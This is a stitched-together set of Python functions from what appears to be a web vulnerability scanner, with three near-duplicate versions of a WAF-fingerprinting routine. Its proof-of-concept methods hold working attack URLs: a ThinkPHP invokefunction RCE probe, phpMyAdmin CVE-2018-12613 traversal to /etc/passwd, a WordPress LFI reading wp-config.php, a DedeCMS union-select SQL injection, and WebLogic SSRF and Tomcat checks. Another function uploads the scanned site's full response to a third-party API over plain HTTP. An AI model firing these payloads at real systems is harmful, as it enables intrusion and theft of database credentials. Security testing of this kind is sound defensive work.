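def check_waf(target, logger_type, proxy=None):
    """Probe *target* with the ``waf_checker`` payloads and report the best-matching WAF.

    For every payload the request is built with ``chambering`` and sent with
    ``requester``.  A response with status >= 400 is scored against each entry
    of ``data/waf_signature`` (body regex, optional ``code`` regex, optional
    ``header`` regex); the highest-scoring signature over all payloads is
    logged through ``factory_logger``.  When nothing scores, a
    "No firewall detected" line is printed instead.

    Args:
        target: URL to probe, as accepted by ``chambering``.
        logger_type: logger kind passed to ``factory_logger``.
        proxy: optional proxy passed through to ``requester``.

    Returns:
        None.  Results are reported via the logger / stdout only.

    Raises:
        KeyError, re.error: if a signature entry lacks ``regex``/``name`` or
            holds an invalid pattern (the original swallowed these silently).
    """
    # folder = Path.cwd().parent
    # waf_file = str(folder / "data/waf_signature")
    waf_file = "data/waf_signature"
    logger = factory_logger(logger_type, target, "Waf")

    # Load the signature database once and close the file before any network
    # traffic starts (the original kept the handle open for the whole scan).
    with open(waf_file, "r", encoding="utf-8") as loader:
        waf_data = json.load(loader)

    best_score = 0
    best_info = {"company": None, "waf_type": None, "bypass_known": None}

    for intruder in waf_checker:
        try:
            # Keep `target` untouched: chambering() returns the rewritten
            # URL/host, and feeding that back in on the next iteration would
            # drop the original parameters.
            probe_url, payload = chambering(target, strike=True, payload=intruder)
            response = requester(probe_url, payload, GET=True, timeout=5, proxy=proxy)
        except Exception:
            # Best effort: one failing payload must not abort the others.
            continue

        if response is None:
            continue

        page, code, headers = response.text, response.status_code, response.headers
        if code < 400:
            continue

        # re.search() needs text: the status code is an int and the headers a
        # mapping, which the original passed in directly (TypeError, swallowed).
        # assumes `headers` is a mapping with .items() — confirm against requester()
        code_text = str(code)
        headers_text = "\n".join(f"{k}: {v}" for k, v in headers.items())

        for waf_name, waf_signature in waf_data.items():
            # Score is per signature; the original accumulated it across all
            # signatures, so later entries inherited earlier hits.  The page
            # body is attacker-controlled text: keep the signature patterns
            # free of catastrophic backtracking.
            score = 0
            if re.search(waf_signature["regex"], page, re.I):
                score += 1
            if "code" in waf_signature and re.search(waf_signature["code"], code_text, re.I):
                score += 1
            if "header" in waf_signature and re.search(waf_signature["header"], headers_text, re.I):
                score += 1

            if score > best_score:
                best_score = score
                best_info = {
                    "company": waf_name,
                    "waf_type": waf_signature["name"],
                    "bypass_known": waf_signature.get("bypass_known"),
                }

    if best_score > 0:
        # The original logged the bare counter (and `waf_match[match] : waf_info`
        # was an annotation, not an assignment, so the best match was lost).
        logger.info(best_info)
    else:
        print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")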
 def __init__(self,target,file,logger_type):
     """Prepare the async DNS state used to enumerate subdomains of *target*.

     Args:
         target: host name; its last two dot-separated labels become
             ``self.domain``.
         file: path kept as ``self.file`` (how it is used is not visible here).
         logger_type: logger kind handed to ``factory_logger``.
     """
     self.file = file
     self.time = time  # module-level `time` captured on the instance
     self.subdomains = set()
     self.file_loader = asyncio.Queue()
     self.loop = asyncio.get_event_loop()
     # Everything after the second-to-last dot, or the whole name when it
     # has fewer than two dots (same result as the maxsplit-based original).
     self.domain = ".".join(target.rsplit(".", 2)[-2:])
     self.resolver = aiodns.DNSResolver(timeout=3, loop=self.loop)
     self.logger = factory_logger(logger_type, target, 'subdomain')
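def detect_info(target, logger_type):
    """Collect middleware / technology information for *target*.

    Fetches the target once, then uploads a zlib-compressed JSON snapshot of
    the response (URL, body, headers) to the third-party
    ``whatweb.bugscaner.com`` API and copies the recognised categories into a
    result dict that is also written to the middleware logger.

    Args:
        target: URL or host accepted by ``chambering``.
        logger_type: logger kind handed to ``factory_logger``.

    Returns:
        A dict keyed by category (``'Waf'``, ``'CDN'``, ...) holding what the
        API reported (``None`` where it reported nothing), or ``None`` when the
        lookup failed; in that case ``{'message': 'Error Message!'}`` is logged.
    """
    logger_middle = factory_logger(logger_type, target, "middleware")
    print(f"{red}[!][{time}] Collecting middleware information....{end}")

    info = {
        'Waf': None,
        'CDN': None,
        'CMS': None,
        'Web Servers': None,
        'Web Frameworks': None,
        'Operating Systems': None,
        'JavaScript Frameworks': None,
        'Programming Languages': None
    }

    # NOTE(review): 'CMS' is initialised above but never copied from the API
    # result — confirm whether the API reports it under this key.
    keys = [
        'Waf', 'CDN', 'Web Servers', 'Web Frameworks', 'Operating Systems',
        'JavaScript Frameworks', 'Programming Languages'
    ]

    url, data = chambering(target, strike=False)

    # NOTE(review): the target's full response body and headers are sent to an
    # external service over plain HTTP; treat this as disclosing the target's
    # content to that third party and to the network path.
    try:
        response = requester(url, data, GET=True)
        snapshot = json.dumps({
            "url": response.url,
            "text": response.text,
            "headers": dict(response.headers)
        })
        result = requests.post("http://whatweb.bugscaner.com/api.go",
                               files={"info": zlib.compress(snapshot.encode())})
        api_data = dict(result.json())
    except Exception as exc:
        # Any failure (request, compression, JSON decoding) becomes an explicit
        # error instead of leaving `data` as the stale value from chambering(),
        # which the original then inspected for an 'error' key.
        api_data = {"error": repr(exc)}

    if 'error' in api_data:
        info.clear()
        info['message'] = "Error Message!"
        logger_middle.info(info)
        return None

    for key in keys:
        if key in api_data:
            info[key] = api_data[key]
    logger_middle.info(info)
    return info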
    def tomcat_cve_2018_11759(self):
        """Check for CVE-2018-11759 by requesting ``/jkstatus;?cmd=dump``.

        A 200 response whose body contains ``ServerRoot=*`` is reported as
        critical on ``self.logger``.  Any exception — including a timeout or
        connection error — is logged as "not found" on a secondary logger, so
        that message does not prove the target is unaffected.
        """
        probe_path = "/jkstatus;?cmd=dump"
        url = self.url + probe_path

        try:
            response = requests.get(url, timeout=5)
            if response.status_code == 200:
                if "ServerRoot=*" in response.text:
                    self.logger.critical(f"url : {url}\n"
                                         f"Tomcat_cve_2018_11759 exists !\n")
        except Exception:
            self.logger_ = factory_logger(self.logger_type, self.target,
                                          "poc not found")
            self.logger_.info("Tomcat_cve_2018_11759 not found !")
    def dedecms_membergroup_sqli(self):
        """Check the DedeCMS ``ajax_membergroup.php`` endpoint.

        Sends the fixed probe URL and reports a critical finding on
        ``self.logger`` when the response is 200 and echoes the marker
        ``123456789``.  Any exception (network errors included) is logged as
        "not found" on a secondary logger.
        """
        probe_path = "/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+123456789+--+@`'`"
        url = self.url + probe_path

        try:
            response = requests.get(url, timeout=5)
            if response.status_code == 200:
                if "123456789" in response.text:
                    self.logger.critical(f"url : {url}\n"
                                         f"Dedecms_membergroup_sqli exists !\n")
        except Exception:
            self.logger_ = factory_logger(self.logger_type, self.target,
                                          "poc not found")
            self.logger_.info("Dedecms_membergroup_sqli not found !")
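    def weblogic_ssrf(self):
        """Check the WebLogic ``uddiexplorer`` endpoint for the SSRF marker.

        Sends the fixed probe URL and reports a critical finding on
        ``self.logger`` when the response is 200 and the body contains either
        ``'127.1.1.1&#39`` or ``Socket Closed``.  Any exception (network
        errors included) is logged as "not found" on a secondary logger.
        """
        url = self.url + "/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700"

        try:
            response = requests.get(url, timeout=5)
            # Parenthesised on purpose: the original `a and b or c` let the
            # "Socket Closed" marker count as a hit for any status code.
            if response.status_code == 200 and (
                    "'127.1.1.1&#39" in response.text
                    or "Socket Closed" in response.text):
                self.logger.critical(f"url : {url}\n"
                                     f"Weblogic_ssrf exists !\n")
        except Exception:
            self.logger_ = factory_logger(self.logger_type, self.target,
                                          "poc not found")
            self.logger_.info("Weblogic ssrf not found !")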
    def __init__(self,target,logger_type,subdomain_queue = None,file = None):
        """Set up scanner state for *target*.

        Args:
            target: URL being scanned; ``extract_domain`` derives its domain.
            logger_type: logger kind handed to ``factory_logger``.
            subdomain_queue: optional queue stored as ``self.subdomains_queue``.
            file: optional path stored as ``self.file`` (use not visible here).
        """
        # Plain attributes copied from the arguments.
        self.target = target
        self.logger_type = logger_type
        self.subdomains_queue = subdomain_queue
        self.file = file

        # Derived helpers.
        self.domain = extract_domain(target)
        self.filter_ = Filter.filter
        self.logger = factory_logger(logger_type, target, "vulnerable")
        self.requests_seen = set()

        # Work queues handed to the scan loop.
        self.target_url = queue.Queue()
        self.Attack_target = queue.Queue()
        self.target_domain = queue.Queue()
    def dedecms_file_inclusion(self):
        """Check the DedeCMS ``carbuyaction.php`` endpoint.

        Sends the fixed probe URL and reports a critical finding on
        ``self.logger`` on any 200 response — the body is not inspected, so
        this check is prone to false positives.  Any exception (network
        errors included) is logged as "not found" on a secondary logger.
        """
        probe_path = r'/plus/carbuyaction.php?dopost=return&code=../../'
        url = self.url + probe_path

        try:
            response = requests.get(url, timeout=5)
            hit = response.status_code == 200
            if hit:
                self.logger.critical(f"url : {url}\n"
                                     f"Dedecms_file_inclusion exists !\n")
        except Exception:
            self.logger_ = factory_logger(self.logger_type, self.target,
                                          "poc not found")
            self.logger_.info("Dedecms_file_inclusion not found !")
    def phpmyadmin_CVE_2018_12613(self):
        """Check for CVE-2018-12613 via the phpMyAdmin ``index.php?target=`` probe.

        Reports a critical finding on ``self.logger`` when the response is 200
        and ``re.match`` (anchored at the start of the body) finds
        ``root:[x*]:0:0:``.  Any exception (network errors included) is logged
        as "not found" on a secondary logger.
        """
        probe_path = r'/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
        url = self.url + probe_path

        try:
            response = requests.get(url, timeout=5)
            if response.status_code == 200:
                if re.match(r'root:[x*]:0:0:', response.text, re.I):
                    self.logger.critical(f"url : {url}\n"
                                         f"Phpmyadmin_CVE_2018_12613 exists !\n")
        except Exception:
            self.logger_ = factory_logger(self.logger_type, self.target,
                                          "poc not found")
            self.logger_.info("Phpmyadmin_CVE_2018_12613 not found !")
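    def wordpress_lfi(self):
        """Check the WordPress ``adaptive-images`` plugin script for file inclusion.

        Sends the fixed probe URL and reports a critical finding on
        ``self.logger`` when the response is 200 and the body contains all of
        ``DB_NAME``, ``DB_USER`` and ``DB_PASSWORD``.  Any exception (network
        errors included) is logged as "not found" on a secondary logger.
        """
        url = self.url + "/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"
        try:
            response = requests.get(url, timeout=5)
            if response.status_code == 200 and all(
                    marker in response.text
                    for marker in ("DB_NAME", "DB_USER", "DB_PASSWORD")):
                self.logger.critical(
                    f"url : {url}\n"
                    f"Wordpress Local file include exists !\n")

        # `except Exception:` instead of the bare `except:` used before: a bare
        # clause also swallowed KeyboardInterrupt/SystemExit, and the sibling
        # PoC methods all catch Exception.
        except Exception:
            self.logger_ = factory_logger(self.logger_type, self.target,
                                          "poc not found")
            self.logger_.info("Wordpress Local file include not found !")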
    def thinkphp_RCE_CVE_2018_5955(self):
        """Check for CVE-2018-5955 via the ThinkPHP ``invokefunction`` probe.

        Prints an empty line, sends the probe with ``requester`` and reports a
        critical finding on ``self.logger`` when the status is 500 and the body
        contains both ``PHP`` and ``System``.  Any exception (network errors
        included) is logged as "not found" on a secondary logger.
        """
        print(f"")

        probe_path = r'/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1'
        url = self.url + probe_path
        try:
            response = requester(url, data=None, GET=True, timeout=5)
            if response.status_code == 500:
                if 'PHP' in response.text and 'System' in response.text:
                    self.logger.critical(f"url : {url}\n"
                                         f"Thinkphp_RCE_CVE_2018_5955 exists !\n")
        except Exception:
            self.logger_ = factory_logger(self.logger_type, self.target,
                                          "poc not found")
            self.logger_.info("Thinkphp_RCE_CVE_2018_5955 not found !")
    def __init__(self,target,logger_type):
        """Initialise the proxy generator.

        Args:
            target: subject passed to ``factory_logger``.
            logger_type: logger kind handed to ``factory_logger``.
        """
        self.logger = factory_logger(logger_type, target, "proxy_generator")

        # presumably a dedup set of proxies already emitted — verify against callers
        self.filter_proxy = set()
        self.container = queue.Queue()

        # Provider name -> pattern object from `regex`; insertion order is kept
        # on purpose in case callers iterate this mapping.
        self.dic = {
            'data5u': regex.data5u,
            'xicidaili': regex.xicidaili,
            'iphai': regex.iphai,
            'xiladaili': regex.xiladaili,
            'ip3366': regex.ip3366,
            'ip_jiangxianli': regex.jiangxianli,
            'ip_huan': regex.ip_huan,
        }

        # Subset of self.dic keys; how it is used is not visible here.
        self.list_name = ['data5u', 'xicidaili', 'iphai']
    def __init__(self,
                 url,
                 logger_type,
                 middleware_info=None,
                 middleware_type=None):
        """Set up the PoC runner for *url*.

        Args:
            url: base URL; stored as both ``self.url`` and ``self.target``.
            logger_type: logger kind handed to ``factory_logger``.
            middleware_info: optional fingerprint data kept as ``self._dic``.
            middleware_type: optional middleware label kept on the instance.
        """
        self.url = url
        self.target = url
        self.logger_type = logger_type
        self.middleware_type = middleware_type
        self._dic = middleware_info
        self.logger = factory_logger(logger_type, url, "poc")

        # Middleware name -> PoC method; dedecms maps to a tuple of two checks.
        self.midd_dic = {
            "thinkphp": self.thinkphp_RCE_CVE_2018_5955,
            "phpmyadmin": self.phpmyadmin_CVE_2018_12613,
            "dedecms": (self.dedecms_file_inclusion,
                        self.dedecms_membergroup_sqli),
            "tomcat": self.tomcat_cve_2018_11759,
            "weblogic": self.weblogic_ssrf,
            "wordpress": self.wordpress_lfi,
        }
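def check_waf(target, logger_type, proxy=None):
    """Fingerprint the WAF in front of *target* using the ``waf_checker`` payloads.

    *target* must carry at least one query parameter (an ``=``), otherwise a
    usage hint is printed and the process exits.  Each payload is classified
    as XSS (starts with ``<``) or SQLi, planted with ``chambering`` and sent
    with ``requester``; responses with status >= 400 are scored against the
    signatures in ``data/waf_signature`` (body regex, optional ``code`` and
    ``header`` regexes, all case-insensitive).  The highest-scoring signature
    is logged through ``factory_logger``; when none matches, "No firewall
    detected" is printed.

    Args:
        target: URL with query parameters.
        logger_type: logger kind passed to ``factory_logger``.
        proxy: optional proxy handed to ``requester``.

    Returns:
        None.  Results are reported via the logger / stdout only.

    Raises:
        SystemExit: when *target* contains no ``=``.
        KeyError, re.error: if a signature entry lacks ``regex``/``name`` or
            holds an invalid pattern (the original swallowed these silently).
    """
    original_target = target
    if "=" not in original_target:  # crude check that the URL has parameters
        print(f"{red}[!][{time}] Please provide a url with parameters! {end}")
        raise SystemExit(1)  # quit() is meant for the interactive shell

    # folder = Path.cwd().parent    # debug only
    # waf_file = str(folder / "data/waf_signature")
    waf_file = "data/waf_signature"
    logger = factory_logger(logger_type, target, "Waf")

    # Load the WAF fingerprints once and close the file before any traffic is
    # sent (the original kept the handle open for the whole scan).
    with open(waf_file, "r", encoding="utf-8") as loader:
        waf_data = json.load(loader)

    best_score = 0
    best_info = {"company": None, "waf_type": None, "bypass_known": None}

    for intruder in waf_checker:  # fuzz payloads used to provoke the WAF
        intruder_type = "XSS" if intruder.startswith("<") else "SQLi"

        try:
            # chambering() returns e.g. ('www.baidu.com', {'a': '1', 'bb': '22'});
            # always start from original_target so the parameters are not lost.
            probe_url, payload = chambering(original_target, strike=True,
                                            payload=intruder, type=intruder_type)
            response = requester(probe_url, payload, GET=True, timeout=5, proxy=proxy)
        except Exception:
            # Best effort: a failing payload must not abort the others.
            continue
        print(f"{purple}[~][{time}] using {intruder} to detect WAF !{end}")

        if response is None:
            continue

        page, code, headers = response.text, response.status_code, response.headers
        if code < 400:
            continue

        # re.search() needs text: the status code is an int and the headers a
        # mapping, which the original passed in directly (TypeError, swallowed).
        # assumes `headers` is a mapping with .items() — confirm against requester()
        code_text = str(code)
        headers_text = "\n".join(f"{k}: {v}" for k, v in headers.items())

        for waf_name, waf_signature in waf_data.items():
            # Score is per signature; the original accumulated it across all
            # signatures, so later entries inherited earlier hits.  The page
            # body is attacker-controlled text: keep the signature patterns
            # free of catastrophic backtracking.
            score = 0
            if re.search(waf_signature["regex"], page, re.I):
                score += 1
            if "code" in waf_signature and re.search(waf_signature["code"], code_text, re.I):
                score += 1
            if "header" in waf_signature and re.search(waf_signature["header"], headers_text, re.I):
                score += 1

            if score > best_score:
                best_score = score
                best_info = {
                    "company": waf_name,
                    "waf_type": waf_signature["name"],
                    "bypass_known": waf_signature.get("bypass_known"),
                }

    if best_score > 0:
        # The original logged the bare counter (and `waf_match[match] : waf_info`
        # was an annotation, not an assignment, so the best match was lost).
        logger.info(best_info)
    else:
        print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")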
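def check_waf(target, logger_type, proxy=None):
    """Fingerprint the WAF in front of *target* using the ``waf_checker`` payloads.

    *target* must carry at least one query parameter (an ``=``), otherwise a
    usage hint is printed and the process exits.  Each payload is classified
    as XSS (starts with ``<``) or SQLi, planted with ``chambering`` and sent
    with ``requester``; responses with status >= 400 are scored against the
    signatures in ``data/waf_signature`` (body regex, optional ``code`` and
    ``header`` regexes, all case-insensitive).  The highest-scoring signature
    is logged through ``factory_logger``; when none matches, "No firewall
    detected" is printed.

    Args:
        target: URL with query parameters.
        logger_type: logger kind passed to ``factory_logger``.
        proxy: optional proxy handed to ``requester``.

    Returns:
        None.  Results are reported via the logger / stdout only.

    Raises:
        SystemExit: when *target* contains no ``=``.
        KeyError, re.error: if a signature entry lacks ``regex``/``name`` or
            holds an invalid pattern (the original swallowed these silently).
    """
    original_target = target
    if "=" not in original_target:  # crude check that the URL has parameters
        print(f"{red}[!][{time}] Please provide a url with parameters! {end}")
        raise SystemExit(1)  # quit() is meant for the interactive shell

    # folder = Path.cwd().parent
    # waf_file = str(folder / "data/waf_signature")
    waf_file = "data/waf_signature"
    logger = factory_logger(logger_type, target, "Waf")

    # Load the WAF fingerprints once and close the file before any traffic is
    # sent (the original kept the handle open for the whole scan).
    with open(waf_file, "r", encoding="utf-8") as loader:
        waf_data = json.load(loader)

    best_score = 0
    best_info = {"company": None, "waf_type": None, "bypass_known": None}

    for intruder in waf_checker:
        intruder_type = "XSS" if intruder.startswith("<") else "SQLi"

        try:
            # Always start from original_target so the parameters are not lost
            # when chambering() rewrites the URL.
            probe_url, payload = chambering(original_target, strike=True,
                                            payload=intruder, type=intruder_type)
            response = requester(probe_url, payload, GET=True, timeout=5, proxy=proxy)
        except Exception:
            # Best effort: a failing payload must not abort the others.
            continue
        print(f"{purple}[~][{time}] using {intruder} to detect WAF !{end}")

        # The original tested `code >= 400` before `code` was assigned, which
        # raised NameError on every iteration and was swallowed by the bare
        # handler — nothing was ever scored.  Unpack first, then compare.
        if response is None:
            continue

        page, code, headers = response.text, response.status_code, response.headers
        if code < 400:
            continue

        # re.search() needs text: the status code is an int and the headers a
        # mapping, which the original passed in directly (TypeError, swallowed).
        # assumes `headers` is a mapping with .items() — confirm against requester()
        code_text = str(code)
        headers_text = "\n".join(f"{k}: {v}" for k, v in headers.items())

        for waf_name, waf_signature in waf_data.items():
            # Score is per signature; the original accumulated it across all
            # signatures, so later entries inherited earlier hits.  The page
            # body is attacker-controlled text: keep the signature patterns
            # free of catastrophic backtracking.
            score = 0
            if re.search(waf_signature["regex"], page, re.I):
                score += 1
            if "code" in waf_signature and re.search(waf_signature["code"], code_text, re.I):
                score += 1
            if "header" in waf_signature and re.search(waf_signature["header"], headers_text, re.I):
                score += 1

            if score > best_score:
                best_score = score
                best_info = {
                    "company": waf_name,
                    "waf_type": waf_signature["name"],
                    "bypass_known": waf_signature.get("bypass_known"),
                }

    if best_score > 0:
        # The original logged the bare counter (and `waf_match[match] : waf_info`
        # was an annotation, not an assignment, so the best match was lost).
        logger.info(best_info)
    else:
        print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")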